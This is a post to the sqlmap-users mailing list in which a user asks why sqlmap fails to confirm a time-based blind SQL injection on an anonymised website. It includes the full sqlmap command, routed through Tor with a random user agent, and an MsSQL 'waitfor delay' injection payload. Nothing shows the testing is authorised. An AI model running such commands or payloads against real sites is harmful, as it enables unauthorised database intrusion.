Hi,
There is a website that vulnerable to SQL injection. I have checked and I'm
sure there is blind sql injection vulnerability but the sqlmap could not
find this.
I tried this command:
./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent
--risk 3 --level 3 --technique=T --dbms="MsSQL"
and the output was something like this:
[INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[INFO] checking if the injection point on GET parameter 'search' is a false
positive
[WARNING] false positive or unexploitable injection point detected
[WARNING] GET parameter 'search' is not injectable
the "search" parameter is vulnerable to this payload: '); waitfor delay
'0:0:0' --
Did I make a mistake or the sqlmap did not find that?
Best Regards
------------------------------------------------------------------------------
Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
from Actuate! Instantly Supercharge Your Business Reports and Dashboards
with Interactivity, Sharing, Native Excel Exports, App Integration & more
Get technology previously reserved for billion-dollar corporations, FREE
http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
